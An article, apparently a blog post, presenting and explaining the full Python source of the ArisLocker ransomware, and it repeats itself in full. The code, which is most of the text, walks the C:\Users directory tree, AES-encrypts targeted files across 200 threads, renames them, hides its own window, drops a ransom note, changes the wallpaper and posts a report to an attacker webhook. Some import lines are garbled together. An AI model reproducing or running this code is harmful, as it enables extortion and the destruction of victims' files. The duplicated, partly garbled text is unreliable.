In this article, we will explore a Python-based file encryption ransomware called ArisLocker. ArisLocker is designed to encrypt files on a victim's machine and demand a ransom for their decryption. We will analyze the code of ArisLocker and understand its functionality.
import win32gui, win32con
import base64
import queue
import threading
import requests
import ctypes
import struct
from plugins.locker import Locker
from plugins.worker import Worker
# Configuration constants
_BACKGROUND_URL = "https://i.ibb.co/g9tTj8H/aris.jpg"
_PATH = "C:\\Users\\"
_BITCOIN_ADDR = "btcaddresshere"
_EMAIL = ""
_WEBHOOK = ""
_EXTENSION = ".aris"
_RANSOM_NOTE = """<Ransom Note Content>"""
_BANNER = "Login For More!\n"
_DATA = {"embeds": [{<Webhook Data>}]}
# List of file extensions to encrypt
_FILE_TYPES = [<List of File Extensions>]
# Locker instance
L = Locker()
# ArisLocker class
class ArisLocker():
def __init__(self):
self.files = []
def login_screen(self):
# Hide the program window
the_program_to_hide = win32gui.GetForegroundWindow()
win32gui.ShowWindow(the_program_to_hide, win32con.SW_HIDE)
def encrypt_file(self, filepath):
# Encrypt the content of the file and rename it with the specified extension
try:
with open(filepath, "rb") as file:
content = L.encrypt_content(file.read())
with open(filepath, "wb") as newF:
newF.write(content)
newF.flush()
newF.close()
os.rename(filepath, filepath + _EXTENSION)
except Exception as e:
print(e)
pass
def file_walker(self):
# Traverse the directory tree and collect files with specified extensions
for subdir, dirs, files in os.walk(_PATH):
for file in files:
filepath = subdir + os.sep + file
for ft in _FILE_TYPES:
if ft in filepath:
self.files.append(filepath)
def alert(self):
# Create ransom note file on the desktop, show a message box, set background image, and send a report
readme = os.environ["HOMEPATH"] + "\\Desktop\\readme.txt"
with open(readme, "w", encoding="utf-8") as important:
important.write(_RANSOM_NOTE)
important.flush()
important.close()
ctypes.windll.user32.MessageBoxW(0, f"I would check the readme.txt on your desktop if I were you ;)", "Important", 0x0 | 0x10)
self.report()
with open("background.jpg","wb") as background:
content = requests.get(_BACKGROUND_URL).content
background.write(content)
background.flush()
background.close()
image = os.path.abspath("background.jpg")
if struct.calcsize('P') * 8 == 64:
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoA(20, 0, image, 3)
def report(self):
# Send a report to a webhook URL
requests.post(_WEBHOOK, json=_DATA)
if __name__ == "__main__":
os.system("cls")
AL = ArisLocker()
AL.login_screen()
AL.file_walker()
q = queue.Queue()
for file in set(AL.files):
q.put(file)
for _ in range(200):
Worker(q, AL.encrypt_file).start()
q.join()
AL.alert()
The main.py file serves as the entry point for the ArisLocker ransomware. Let's go through its key components and functionalities:
Import necessary modules: The script imports required modules such as os, win32gui, win32con, base64, queue, threading, requests, ctypes, and struct. These modules are used for different functionalities like interacting with the operating system, GUI manipulation, networking, and threading.
Import Locker and Worker classes: This part of the code used to imports the Locker class from locker.py and the Worker class from worker.py. These classes can be used to perform file encryption and multi-threaded file processing, etc.
Configuration constants: In this part of the code user is setting up the configuration for the malware as _BACKGROUND_URL, _PATH, _BITCOIN_ADDR, _EMAIL, _WEBHOOK, _EXTENSION, _RANSOM_NOTE, _BANNER, _DATA, _FILE_TYPES, and L. These constants configure different things for the ransomware, like background image URL, file paths, ransom note content, and file types to encrypt.
ArisLocker class: The ArisLocker class is the backbone of the whole code that contains the main functionality of the ransomware.
login_screen: This part of code hides the program window using win32gui and win32con, and also creates a fake login screen to trick the user.
encrypt_file: These code lines will be used to encrypt the content of a file using the Locker.encrypt_content method and renames the file with the extension specified by the attacker.
file_walker: This part of code goes through the directory tree starting from the specified _PATH and collects files with extensions specified in _FILE_TYPES.
alert: This method drops a ransom note file on the victim's desktop folder, and also displays a message box. It will also change the background image using SystemParametersInfoW or SystemParametersInfoA (with be selected after checking system architecture). It will also send a report to the specified webhook URL.
report: This part of code will send a report containing information about the ransomware execution to the attacker webhook URL.
Execution flow: This part of code starts an instance of ArisLocker as AL, clears the console screen, calls login_screen to hide the program window, invokes file_walker to collect files for encryption, creates a thread-safe Queue object q, adds files to the queue, creates worker threads using the Worker class, starts the worker threads, waits for all tasks to complete using q.join(), and finally calls alert to display the ransom note, set the background image, and send a report.
import threading
class Worker(threading.Thread):
def __init__(self, q, target):
self.q = q
self.target = target
super().__init__()
def run(self):
while True:
try:
work = self.q.get(timeout=5)
except queue.Empty:
return
self.target(work)
self.q.task_done()
The worker.py file contains the Worker class, which is responsible for processing files in a multi-threaded manner.
__init__: Initializes the Worker object with a queue (q) and a target function to be executed on each item from the queue.
run: Overrides the run method of the Thread class. The worker thread continuously retrieves work items from the queue until it is empty. For each work item, it calls the target function with the item as an argument and marks the task as done using q.task_done().
import string
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
class Locker():
def __init__(self):
self.key = self.generate_key(32)
self.crypto = AES.new(self.key.encode(), AES.MODE_ECB)
def generate_key(self, klen):
return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(klen))
def encrypt_content(self, content):
encrypted_text = self.crypto.encrypt(pad(content, 32))
return encrypted_text
The locker.py file contains the Locker class, which provides file encryption functionality using AES encryption.
__init__: Initializes the Locker object by generating a random encryption key of length klen (32 characters) using alphanumeric characters.
generate_key: Generates a random encryption key by selecting characters randomly from string.ascii_letters (lowercase and uppercase letters) and string.digits (digits).
encrypt_content: Encrypts the given content using AES encryption in ECB mode. The content is padded using Crypto.Util.Padding.pad to ensure its length is a multiple of the block size (32 bytes in this case). The encrypted text is returned.
Note : It's important to note that developing or using ransomware is illegal and unethical. This article serves an educational purpose to understand the inner workings of such malware.
Overview
ArisLocker consists of three main components: main.py: The main script that orchestrates the ransomware attack. worker.py: A worker thread class responsible for encrypting individual files. locker.py: A helper class that provides encryption functionality.Let's analyze the code of each component to understand how ArisLocker works.
main.py
import osimport win32gui, win32con
import base64
import queue
import threading
import requests
import ctypes
import struct
from plugins.locker import Locker
from plugins.worker import Worker
# Configuration constants
_BACKGROUND_URL = "https://i.ibb.co/g9tTj8H/aris.jpg"
_PATH = "C:\\Users\\"
_BITCOIN_ADDR = "btcaddresshere"
_EMAIL = ""
_WEBHOOK = ""
_EXTENSION = ".aris"
_RANSOM_NOTE = """<Ransom Note Content>"""
_BANNER = "Login For More!\n"
_DATA = {"embeds": [{<Webhook Data>}]}
# List of file extensions to encrypt
_FILE_TYPES = [<List of File Extensions>]
# Locker instance
L = Locker()
# ArisLocker class
class ArisLocker():
def __init__(self):
self.files = []
def login_screen(self):
# Hide the program window
the_program_to_hide = win32gui.GetForegroundWindow()
win32gui.ShowWindow(the_program_to_hide, win32con.SW_HIDE)
def encrypt_file(self, filepath):
# Encrypt the content of the file and rename it with the specified extension
try:
with open(filepath, "rb") as file:
content = L.encrypt_content(file.read())
with open(filepath, "wb") as newF:
newF.write(content)
newF.flush()
newF.close()
os.rename(filepath, filepath + _EXTENSION)
except Exception as e:
print(e)
pass
def file_walker(self):
# Traverse the directory tree and collect files with specified extensions
for subdir, dirs, files in os.walk(_PATH):
for file in files:
filepath = subdir + os.sep + file
for ft in _FILE_TYPES:
if ft in filepath:
self.files.append(filepath)
def alert(self):
# Create ransom note file on the desktop, show a message box, set background image, and send a report
readme = os.environ["HOMEPATH"] + "\\Desktop\\readme.txt"
with open(readme, "w", encoding="utf-8") as important:
important.write(_RANSOM_NOTE)
important.flush()
important.close()
ctypes.windll.user32.MessageBoxW(0, f"I would check the readme.txt on your desktop if I were you ;)", "Important", 0x0 | 0x10)
self.report()
with open("background.jpg","wb") as background:
content = requests.get(_BACKGROUND_URL).content
background.write(content)
background.flush()
background.close()
image = os.path.abspath("background.jpg")
if struct.calcsize('P') * 8 == 64:
ctypes.windll.user32.SystemParametersInfoW(20, 0, image, 3)
else:
ctypes.windll.user32.SystemParametersInfoA(20, 0, image, 3)
def report(self):
# Send a report to a webhook URL
requests.post(_WEBHOOK, json=_DATA)
if __name__ == "__main__":
os.system("cls")
AL = ArisLocker()
AL.login_screen()
AL.file_walker()
q = queue.Queue()
for file in set(AL.files):
q.put(file)
for _ in range(200):
Worker(q, AL.encrypt_file).start()
q.join()
AL.alert()
The main.py file serves as the entry point for the ArisLocker ransomware. Let's go through its key components and functionalities:
Import necessary modules: The script imports required modules such as os, win32gui, win32con, base64, queue, threading, requests, ctypes, and struct. These modules are used for different functionalities like interacting with the operating system, GUI manipulation, networking, and threading.
Import Locker and Worker classes: This part of the code used to imports the Locker class from locker.py and the Worker class from worker.py. These classes can be used to perform file encryption and multi-threaded file processing, etc.
Configuration constants: In this part of the code user is setting up the configuration for the malware as _BACKGROUND_URL, _PATH, _BITCOIN_ADDR, _EMAIL, _WEBHOOK, _EXTENSION, _RANSOM_NOTE, _BANNER, _DATA, _FILE_TYPES, and L. These constants configure different things for the ransomware, like background image URL, file paths, ransom note content, and file types to encrypt.
ArisLocker class: The ArisLocker class is the backbone of the whole code that contains the main functionality of the ransomware.
login_screen: This part of code hides the program window using win32gui and win32con, and also creates a fake login screen to trick the user.
encrypt_file: These code lines will be used to encrypt the content of a file using the Locker.encrypt_content method and renames the file with the extension specified by the attacker.
file_walker: This part of code goes through the directory tree starting from the specified _PATH and collects files with extensions specified in _FILE_TYPES.
alert: This method drops a ransom note file on the victim's desktop folder, and also displays a message box. It will also change the background image using SystemParametersInfoW or SystemParametersInfoA (with be selected after checking system architecture). It will also send a report to the specified webhook URL.
report: This part of code will send a report containing information about the ransomware execution to the attacker webhook URL.
Execution flow: This part of code starts an instance of ArisLocker as AL, clears the console screen, calls login_screen to hide the program window, invokes file_walker to collect files for encryption, creates a thread-safe Queue object q, adds files to the queue, creates worker threads using the Worker class, starts the worker threads, waits for all tasks to complete using q.join(), and finally calls alert to display the ransom note, set the background image, and send a report.
worker.py
import queueimport threading
class Worker(threading.Thread):
def __init__(self, q, target):
self.q = q
self.target = target
super().__init__()
def run(self):
while True:
try:
work = self.q.get(timeout=5)
except queue.Empty:
return
self.target(work)
self.q.task_done()
The worker.py file contains the Worker class, which is responsible for processing files in a multi-threaded manner.
__init__: Initializes the Worker object with a queue (q) and a target function to be executed on each item from the queue.
run: Overrides the run method of the Thread class. The worker thread continuously retrieves work items from the queue until it is empty. For each work item, it calls the target function with the item as an argument and marks the task as done using q.task_done().
locker.py
import randomimport string
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
class Locker():
def __init__(self):
self.key = self.generate_key(32)
self.crypto = AES.new(self.key.encode(), AES.MODE_ECB)
def generate_key(self, klen):
return ''.join(random.choice(string.ascii_letters + string.digits) for i in range(klen))
def encrypt_content(self, content):
encrypted_text = self.crypto.encrypt(pad(content, 32))
return encrypted_text
The locker.py file contains the Locker class, which provides file encryption functionality using AES encryption.
__init__: Initializes the Locker object by generating a random encryption key of length klen (32 characters) using alphanumeric characters.
generate_key: Generates a random encryption key by selecting characters randomly from string.ascii_letters (lowercase and uppercase letters) and string.digits (digits).
encrypt_content: Encrypts the given content using AES encryption in ECB mode. The content is padded using Crypto.Util.Padding.pad to ensure its length is a multiple of the block size (32 bytes in this case). The encrypted text is returned.
Conclusion
This is just a source code of a basic ransomware famous as the name of ArisLocker. It encrypts files with specific extensions in the specified directory and displays a ransom note, demanding a payment in Bitcoin to decrypt the files. It also sends a report to a webhook URL with information about the infected user. Please note that this code is for educational purposes only, and deploying or using such code for malicious purposes is illegal and unethical.
